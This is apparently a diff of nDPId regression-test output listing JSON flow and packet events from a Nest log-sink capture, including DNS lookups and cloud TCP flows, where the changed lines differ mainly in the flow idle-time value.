+00699{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":707,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":49,"flow_first_seen":1536717428089,"flow_last_seen":1536717431514,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":678,"flow_tot_l4_payload_len":9343,"flow_avg_l4_payload_len":190,"midstream":0,"thread_ts_msec":1536717572672,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.188.154.186","src_port":63348,"dst_port":11095,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NestLogSink","breed":"Acceptable","category":"Cloud"}} 00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":711,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1536717427961,"flow_last_seen":1536717450088,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":127,"flow_tot_l4_payload_len":322,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1536717632764,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"192.168.242.1","src_port":52849,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 00564{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":727,"source":"nest_log_sink.pcap","alias":"nDPId-test","packets-captured":727,"packets-processed":562,"total-skipped-flows":0,"total-l4-data-len":56297,"total-not-detected-flows":0,"total-guessed-flows":1,"total-detected-flows":12,"total-detection-updates":3,"total-updates":0,"current-active-flows":1,"total-active-flows":12,"total-idle-flows":11,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":85,"global_ts_msec":1536717873194} -00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":745,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1536718052990,"flow_last_seen":1536718052990,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1536718052990,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.174.82.237","src_port":63350,"dst_port":11095,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":745,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1536718052990,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1536718052990,"pkt":"AJD7JidrGLQwJjRACABFAAAsMIsAAP8GYe3AqPIPI65S7fd2K1cJGivXAAAAAGACEgAGSAAAAgQEgAAA"} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":747,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1536718053059,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1536718053059,"pkt":"GLQwJjRAAJD7JidrCABFAAAsAABAAC0GJHkjrlLtwKjyDytX93aQyd5SCRor2GASaQM+4wAAAgQFtA=="} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":748,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":1536718053062,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1536718053062,"pkt":"AJD7JidrGLQwJjRACABFAAAoMIwAAP8GYfDAqPIPI65S7fd2K1cJGivYkMneU1AQEgCtowAAAAAAAAAA"} -00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":753,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1536718052990,"flow_last_seen":1536718055162,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":677,"flow_tot_l4_payload_len":1260,"flow_avg_l4_payload_len":157,"midstream":0,"thread_ts_msec":1536718055162,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.174.82.237","src_port":63350,"dst_port":11095,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"NestLogSink","breed":"Acceptable","category":"Cloud"}} -00697{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":779,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":52,"flow_first_seen":1536717450091,"flow_last_seen":1536718053058,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":678,"flow_tot_l4_payload_len":3362,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1536718175916,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.174.82.237","src_port":63349,"dst_port":11095,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NestLogSink","breed":"Acceptable","category":"Cloud"}} +00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":745,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1536718052990,"flow_last_seen":1536718052990,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1536718052990,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.174.82.237","src_port":63350,"dst_port":11095,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":745,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1536718052990,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1536718052990,"pkt":"AJD7JidrGLQwJjRACABFAAAsMIsAAP8GYe3AqPIPI65S7fd2K1cJGivXAAAAAGACEgAGSAAAAgQEgAAA"} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":747,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1536718053059,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1536718053059,"pkt":"GLQwJjRAAJD7JidrCABFAAAsAABAAC0GJHkjrlLtwKjyDytX93aQyd5SCRor2GASaQM+4wAAAgQFtA=="} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":748,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":1536718053062,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1536718053062,"pkt":"AJD7JidrGLQwJjRACABFAAAoMIwAAP8GYfDAqPIPI65S7fd2K1cJGivYkMneU1AQEgCtowAAAAAAAAAA"} +00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":753,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1536718052990,"flow_last_seen":1536718055162,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":677,"flow_tot_l4_payload_len":1260,"flow_avg_l4_payload_len":157,"midstream":0,"thread_ts_msec":1536718055162,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.174.82.237","src_port":63350,"dst_port":11095,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"NestLogSink","breed":"Acceptable","category":"Cloud"}} +00697{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":779,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":52,"flow_first_seen":1536717450091,"flow_last_seen":1536718053058,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":678,"flow_tot_l4_payload_len":3362,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1536718175916,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.174.82.237","src_port":63349,"dst_port":11095,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NestLogSink","breed":"Acceptable","category":"Cloud"}} 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":779,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1536718202959,"flow_last_seen":1536718202959,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1536718202959,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"192.168.242.1","src_port":52849,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":779,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1536718202959,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1536718202959,"pkt":"AJD7JidrGLQwJjRACABFAABEMJoAAP8RJazAqPIPwKjyAc5xADUAMPGqwpsBAAABAAAAAAAADXdlYXZlLWxvZ3NpbmsEbmVzdANjb20AAAEAAQ=="} 00784{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":779,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1536718202959,"flow_last_seen":1536718202959,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1536718202959,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"192.168.242.1","src_port":52849,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"weave-logsink.nest.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00516{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":780,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":2,"flow_last_seen":1536718202959,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":98,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":98,"pkt_l4_len":64,"thread_ts_msec":1536718202959,"pkt":"GLQwJjRAAJD7JidrCABFAABUb5VAAEARZaHAqPIBwKjyDwA1znEAQGW0wpuBgAABAAEAAAAADXdlYXZlLWxvZ3NpbmsEbmVzdANjb20AAAEAAcAMAAEAAQAAAHgABCO8mro="} 00799{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":780,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1536718202959,"flow_last_seen":1536718202959,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1536718202959,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"192.168.242.1","src_port":52849,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"weave-logsink.nest.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"35.188.154.186"}} -00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":781,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1536718202984,"flow_last_seen":1536718202984,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1536718202984,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.188.154.186","src_port":63351,"dst_port":11095,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":781,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1536718202984,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1536718202984,"pkt":"AJD7JidrGLQwJjRACABFAAAsMJsAAP8GGgLAqPIPI7yauvd3K1cJJajVAAAAAGACEgBBYgAAAgQEgAAA"} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":782,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1536718203039,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1536718203039,"pkt":"GLQwJjRAAJD7JidrCABFAAAsAABAADcG0p0jvJq6wKjyDytX93fElurmCSWo1mASbvAz1wAAAgQFjA=="} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":783,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":3,"flow_last_seen":1536718203042,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1536718203042,"pkt":"AJD7JidrGLQwJjRACABFAAAoMJwAAP8GGgXAqPIPI7yauvd3K1cJJajWxJbq51AQEgCoXAAAAAAAAAAA"} -00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":788,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1536718202984,"flow_last_seen":1536718205132,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":679,"flow_tot_l4_payload_len":1261,"flow_avg_l4_payload_len":157,"midstream":0,"thread_ts_msec":1536718205132,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.188.154.186","src_port":63351,"dst_port":11095,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"NestLogSink","breed":"Acceptable","category":"Cloud"}} -00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":834,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1536718206572,"flow_last_seen":1536718206572,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1536718206572,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.174.82.237","src_port":63352,"dst_port":11095,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":834,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1536718206572,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1536718206572,"pkt":"AJD7JidrGLQwJjRACABFAAAsMLcAAP8GYcHAqPIPI65S7fd4K1cJMSXhAAAAAGACEgAMJQAAAgQEgAAA"} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":836,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":2,"flow_last_seen":1536718206638,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1536718206638,"pkt":"GLQwJjRAAJD7JidrCABFAAAsAABAAC0GJHkjrlLtwKjyDytX93jm8XvxCTEl4mASaQNQ+QAAAgQFtA=="} -00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":837,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":3,"flow_last_seen":1536718206640,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1536718206640,"pkt":"AJD7JidrGLQwJjRACABFAAAoMLgAAP8GYcTAqPIPI65S7fd4K1cJMSXi5vF78lAQEgC\/uQAAAAAAAAAA"} -00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":844,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1536718206572,"flow_last_seen":1536718208745,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":676,"flow_tot_l4_payload_len":1260,"flow_avg_l4_payload_len":157,"midstream":0,"thread_ts_msec":1536718208745,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.174.82.237","src_port":63352,"dst_port":11095,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"NestLogSink","breed":"Acceptable","category":"Cloud"}} -00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":858,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1536718209313,"flow_last_seen":1536718209313,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1536718209313,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.188.154.186","src_port":63353,"dst_port":11095,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":858,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1536718209313,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1536718209313,"pkt":"AJD7JidrGLQwJjRACABFAAAsMMIAAP8GGdvAqPIPI7yauvd5K1cJPKL3AAAAAGACEgBHJwAAAgQEgAAA"} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":860,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":2,"flow_last_seen":1536718209383,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1536718209383,"pkt":"GLQwJjRAAJD7JidrCABFAAAsAABAADcG0p0jvJq6wKjyDytX93le92HNCTyi+GASbvAoVQAAAgQFjA=="} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":861,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":3,"flow_last_seen":1536718209385,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1536718209385,"pkt":"AJD7JidrGLQwJjRACABFAAAoMMQAAP8GGd3AqPIPI7yauvd5K1cJPKL4XvdhzlAQEgCc2gAAAAAAAAAA"} -00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":866,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1536718209313,"flow_last_seen":1536718211481,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":678,"flow_tot_l4_payload_len":1262,"flow_avg_l4_payload_len":157,"midstream":0,"thread_ts_msec":1536718211481,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.188.154.186","src_port":63353,"dst_port":11095,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"NestLogSink","breed":"Acceptable","category":"Cloud"}} -00698{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":892,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":32,"flow_first_seen":1536718052990,"flow_last_seen":1536718206634,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":677,"flow_tot_l4_payload_len":3362,"flow_avg_l4_payload_len":105,"midstream":0,"thread_ts_msec":1536718332214,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.174.82.237","src_port":63350,"dst_port":11095,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NestLogSink","breed":"Acceptable","category":"Cloud"}} -00699{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":892,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":49,"flow_first_seen":1536718202984,"flow_last_seen":1536718206546,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":679,"flow_tot_l4_payload_len":9459,"flow_avg_l4_payload_len":193,"midstream":0,"thread_ts_msec":1536718332214,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.188.154.186","src_port":63351,"dst_port":11095,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NestLogSink","breed":"Acceptable","category":"Cloud"}} -00699{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":892,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1536718209313,"flow_last_seen":1536718211968,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":678,"flow_tot_l4_payload_len":2258,"flow_avg_l4_payload_len":112,"midstream":0,"thread_ts_msec":1536718332214,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.188.154.186","src_port":63353,"dst_port":11095,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NestLogSink","breed":"Acceptable","category":"Cloud"}} +00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":781,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1536718202984,"flow_last_seen":1536718202984,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1536718202984,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.188.154.186","src_port":63351,"dst_port":11095,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":781,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1536718202984,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1536718202984,"pkt":"AJD7JidrGLQwJjRACABFAAAsMJsAAP8GGgLAqPIPI7yauvd3K1cJJajVAAAAAGACEgBBYgAAAgQEgAAA"} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":782,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1536718203039,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1536718203039,"pkt":"GLQwJjRAAJD7JidrCABFAAAsAABAADcG0p0jvJq6wKjyDytX93fElurmCSWo1mASbvAz1wAAAgQFjA=="} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":783,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":3,"flow_last_seen":1536718203042,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1536718203042,"pkt":"AJD7JidrGLQwJjRACABFAAAoMJwAAP8GGgXAqPIPI7yauvd3K1cJJajWxJbq51AQEgCoXAAAAAAAAAAA"} +00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":788,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1536718202984,"flow_last_seen":1536718205132,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":679,"flow_tot_l4_payload_len":1261,"flow_avg_l4_payload_len":157,"midstream":0,"thread_ts_msec":1536718205132,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.188.154.186","src_port":63351,"dst_port":11095,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"NestLogSink","breed":"Acceptable","category":"Cloud"}} +00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":834,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1536718206572,"flow_last_seen":1536718206572,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1536718206572,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.174.82.237","src_port":63352,"dst_port":11095,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":834,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1536718206572,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1536718206572,"pkt":"AJD7JidrGLQwJjRACABFAAAsMLcAAP8GYcHAqPIPI65S7fd4K1cJMSXhAAAAAGACEgAMJQAAAgQEgAAA"} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":836,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":2,"flow_last_seen":1536718206638,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1536718206638,"pkt":"GLQwJjRAAJD7JidrCABFAAAsAABAAC0GJHkjrlLtwKjyDytX93jm8XvxCTEl4mASaQNQ+QAAAgQFtA=="} 